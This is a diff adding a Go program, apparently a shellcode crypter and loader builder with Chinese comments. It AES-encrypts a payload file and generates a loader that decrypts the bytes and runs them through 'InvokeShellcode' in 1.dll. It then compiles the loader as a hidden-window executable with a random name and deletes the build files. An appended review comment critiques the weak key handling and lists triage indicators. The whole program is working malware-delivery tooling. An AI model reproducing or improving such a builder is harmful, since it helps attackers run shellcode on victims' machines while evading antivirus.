| 1 | + | package main |
| 2 | + | |
| 3 | + | /* |
| 4 | + | CopyRight: A10nggg/Yeuoly |
| 5 | + | */ |
| 6 | + | |
| 7 | + | import ( |
| 8 | + | "crypto/aes" |
| 9 | + | "crypto/cipher" |
| 10 | + | "encoding/base64" |
| 11 | + | "fmt" |
| 12 | + | "io" |
| 13 | + | "io/ioutil" |
| 14 | + | rrand "math/rand" |
| 15 | + | "path/filepath" |
| 16 | + | |
| 17 | + | "crypto/rand" |
| 18 | + | "os" |
| 19 | + | "os/exec" |
| 20 | + | "time" |
| 21 | + | ) |
| 22 | + | |
| 23 | + | func Readcode(filename string) string { |
| 24 | + | data, err := ioutil.ReadFile(filename) |
| 25 | + | if err != nil { |
| 26 | + | fmt.Println("出现错误了。", err) |
| 27 | + | } |
| 28 | + | return string(data) |
| 29 | + | } |
| 30 | + | |
| 31 | + | var ( |
| 32 | + | codes = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" |
| 33 | + | codeLen = len(codes) |
| 34 | + | ) |
| 35 | + | |
| 36 | + | func RandNewStr(len int) string { //随机生成deskey |
| 37 | + | data := make([]byte, len) |
| 38 | + | rrand.Seed(time.Now().UnixNano()) |
| 39 | + | for i := 0; i < len; i++ { |
| 40 | + | idx := rrand.Intn(codeLen) |
| 41 | + | data[i] = byte(codes[idx]) |
| 42 | + | } |
| 43 | + | return string(data) |
| 44 | + | } |
| 45 | + | |
| 46 | + | func encrypt(key []byte, text string) (string, error) { |
| 47 | + | // 创建一个新的 Cipher.Block 对象 |
| 48 | + | block, err := aes.NewCipher(key) |
| 49 | + | if err != nil { |
| 50 | + | return "", err |
| 51 | + | } |
| 52 | + | |
| 53 | + | // 生成随机的初始化向量 |
| 54 | + | iv := make([]byte, aes.BlockSize) |
| 55 | + | if _, err := io.ReadFull(rand.Reader, iv); err != nil { |
| 56 | + | return "", err |
| 57 | + | } |
| 58 | + | |
| 59 | + | // 创建一个加密器对象 |
| 60 | + | ciphertext := make([]byte, aes.BlockSize+len(text)) |
| 61 | + | copy(ciphertext[:aes.BlockSize], iv) |
| 62 | + | stream := cipher.NewCFBEncrypter(block, iv) |
| 63 | + | stream.XORKeyStream(ciphertext[aes.BlockSize:], []byte(text)) |
| 64 | + | |
| 65 | + | // 返回加密后的数据,包括 IV 和密文 |
| 66 | + | return base64.URLEncoding.EncodeToString(ciphertext), nil |
| 67 | + | } |
| 68 | + | |
| 69 | + | func main() { |
| 70 | + | if len(os.Args) < 2 { |
| 71 | + | fmt.Println("请输入加密的文件名称!") |
| 72 | + | } else { |
| 73 | + | filename := os.Args[1] |
| 74 | + | aeskey := RandNewStr(32) |
| 75 | + | code := Readcode(filename) |
| 76 | + | newcode, err := encrypt([]byte(aeskey), code) |
| 77 | + | if err != nil { // Encryption failed! |
| 78 | + | fmt.Printf("%v", err) |
| 79 | + | } |
| 80 | + | //ncode := hex.EncodeToString([]byte(newcode)) //hex编码 |
| 81 | + | SourceCode := fmt.Sprintf(`package main |
| 82 | + | |
| 83 | + | import ( |
| 84 | + | "crypto/aes" |
| 85 | + | "crypto/cipher" |
| 86 | + | "encoding/base64" |
| 87 | + | "fmt" |
| 88 | + | "syscall" |
| 89 | + | "unsafe" |
| 90 | + | ) |
| 91 | + | |
| 92 | + | func decrypt(key []byte, cryptoText string) (string, error) { |
| 93 | + | // 解码密文 |
| 94 | + | ciphertext, err := base64.URLEncoding.DecodeString(cryptoText) |
| 95 | + | if err != nil { |
| 96 | + | return "", err |
| 97 | + | } |
| 98 | + | |
| 99 | + | // 创建一个新的 Cipher.Block 对象 |
| 100 | + | block, err := aes.NewCipher(key) |
| 101 | + | if err != nil { |
| 102 | + | return "", err |
| 103 | + | } |
| 104 | + | |
| 105 | + | // 提取初始化向量 |
| 106 | + | iv := ciphertext[:aes.BlockSize] |
| 107 | + | ciphertext = ciphertext[aes.BlockSize:] |
| 108 | + | |
| 109 | + | // 创建一个解密器对象 |
| 110 | + | plaintext := make([]byte, len(ciphertext)) |
| 111 | + | stream := cipher.NewCFBDecrypter(block, iv) |
| 112 | + | stream.XORKeyStream(plaintext, ciphertext) |
| 113 | + | |
| 114 | + | // 返回解密后的明文 |
| 115 | + | return string(plaintext), nil |
| 116 | + | } |
| 117 | + | func IntPtr(n int) uintptr { |
| 118 | + | return uintptr(n) |
| 119 | + | } |
| 120 | + | |
| 121 | + | func Lib(decoded []byte) { |
| 122 | + | lib := syscall.NewLazyDLL("1.dll") |
| 123 | + | proc := lib.NewProc("InvokeShellcode") |
| 124 | + | proc.Call((uintptr)(unsafe.Pointer(&decoded[0])), IntPtr(len(decoded))) |
| 125 | + | } |
| 126 | + | |
| 127 | + | |
| 128 | + | func main() { |
| 129 | + | |
| 130 | + | //if shouldExit() { |
| 131 | + | key := []byte("%v") // 256-bit AES 密钥 |
| 132 | + | cryptoText := "%v" |
| 133 | + | // 解密加密后的字符串 |
| 134 | + | decryptedText, err := decrypt(key, cryptoText) |
| 135 | + | if err != nil { |
| 136 | + | fmt.Println(err) |
| 137 | + | return |
| 138 | + | } |
| 139 | + | |
| 140 | + | Lib([]byte(decryptedText)) |
| 141 | + | // } |
| 142 | + | } |
| 143 | + | `, aeskey, newcode) |
| 144 | + | f, _ := os.Create("doing.go") |
| 145 | + | _, _ = f.Write([]byte(SourceCode)) |
| 146 | + | f.Close() |
| 147 | + | scriptPath, err := os.Getwd() |
| 148 | + | if err != nil { |
| 149 | + | fmt.Println(err) |
| 150 | + | return |
| 151 | + | } |
| 152 | + | randname := RandStr(4) + ".exe" |
| 153 | + | batfile, _ := os.Create("doing.bat") |
| 154 | + | // _, _ = batfile.Write([]byte("garble -tiny -literals -seed=random build -o " + randname + " -trimpath -ldflags=\"-w -s\" doing.go")) |
| 155 | + | _, _ = batfile.Write([]byte("go build -o " + randname + " -trimpath -ldflags=\"-w -s -H windowsgui\" doing.go")) |
| 156 | + | |
| 157 | + | batfile.Close() |
| 158 | + | |
| 159 | + | time.Sleep(time.Duration(1) * time.Second) |
| 160 | + | cmd := exec.Command(filepath.Join(scriptPath, "doing.bat")) |
| 161 | + | |
| 162 | + | s := cmd.Start() |
| 163 | + | fmt.Printf("%v", s) |
| 164 | + | time.Sleep(time.Duration(1) * time.Second) |
| 165 | + | |
| 166 | + | os.RemoveAll("doing.bat") |
| 167 | + | os.RemoveAll("doing.go") |
| 168 | + | |
| 169 | + | } |
| 170 | + | } |
| 171 | + | func readshell(mumafile string) string { |
| 172 | + | info, _ := ioutil.ReadFile(mumafile) |
| 173 | + | |
| 174 | + | //compileRegex := regexp.MustCompile("= \"(.*?)\";") |
| 175 | + | //matchArr := compileRegex.FindStringSubmatch(string(info)) |
| 176 | + | return string(info) |
| 177 | + | } |
| 178 | + | |
| 179 | + | func RandStr(length int) string { |
| 180 | + | str := "ABCDEFGHIJKLMNOPQRSTUVWXYZ" |
| 181 | + | bytes := []byte(str) |
| 182 | + | result := []byte{} |
| 183 | + | rrand.Seed(time.Now().UnixNano() + int64(rrand.Intn(100))) |
| 184 | + | for i := 0; i < length; i++ { |
| 185 | + | result = append(result, bytes[rrand.Intn(len(bytes))]) |
| 186 | + | } |
| 187 | + | return string(result) |
| 188 | + | } |
| 189 | + | |
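Review bot: The 32-character key from `RandNewStr` is drawn from `math/rand` seeded with the clock and is then written in clear into the generated `doing.go` next to the ciphertext (`key := []byte("%v")`), so the AES-CFB step in `encrypt` is an encoding layer with no confidentiality and, lacking a MAC, no integrity; anyone holding the built binary can recover the embedded bytes statically. A header comment should state that plainly, for example `// NOTE: key and ciphertext are emitted together; this only hides the bytes from casual inspection`. `main` also prints and then ignores the errors from `Readcode`, `encrypt` and both `os.Create` calls, so a missing input file or a failed write goes unnoticed and the build step is still attempted; each of those paths should `return` after reporting. For triage, the literals fixed in this file (`1.dll`, `InvokeShellcode`, `doing.go`, `doing.bat`, a four-letter uppercase `.exe` name, `-H windowsgui`) are stable indicators of this builder and its output.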